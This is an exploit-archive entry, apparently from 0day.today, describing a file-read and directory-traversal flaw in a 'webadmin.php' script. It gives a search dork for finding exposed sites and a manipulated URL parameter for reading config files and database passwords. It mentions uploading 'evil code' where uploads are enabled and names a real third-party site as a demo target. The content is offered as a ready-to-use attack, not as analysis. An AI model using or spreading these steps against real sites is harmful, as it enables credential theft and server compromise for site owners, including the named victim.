Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtDrgpxX1337DAY-ID-12715
HistoryJun 15, 2010 - 12:00 a.m.

Read local Config File source (webadmin.php) Vulnerability

2010-06-1500:00:00
DrgpxX
0day.today
19
JSON

Exploit for php platform in category web applications

==========================================================
Read local Config File source (webadmin.php) Vulnerability
==========================================================


Author          : DrgpxX
Group           : Aras cyber Army
Email            : [email protected]
Discover        : 13 june 2010
Critical Lvl      : high
Publised        : 15 june 2010
---------------------------------------------------------------------------
Read local Config File source  (webadmin.php)
~~~~~~~~~
Dork : Inurl:"webadmin.php"
~~~~~~~~~~~~~~~~~~
For read config file or etc just Click on change button and next url must be
like :: webadmin.php?id=drq8bvtuvhhqhq4ka8vcg11kn3&dir=%2Fvar%2Fwww%2Fvhosts%2target.com%2Fhttpdocs%2F
now clear id=drq8bvtuvhhqhq4ka8vcg11kn3& in url and write ur file to read source like
dir=index.php
wow ! now u can read data like dbpass traversing directories hijacking source file and etc
IF upload enabled!
you can upload Your evil Code !

~~~~~~~~~~~~~~~~~~~~~~~~~
demp site : just for edu)
http://www.albania-sport.com/webadmin.php

+++++++++++++++++++++++++++++++++++++++
[!] greetiz to ::
    D3stan,grtl,mehdi,hamed.err000r
    All Muslim , Turkish , iranian hackers

+++++++++++++++++++++++++++++++++++++++



#  0day.today [2018-04-08]  #
JSON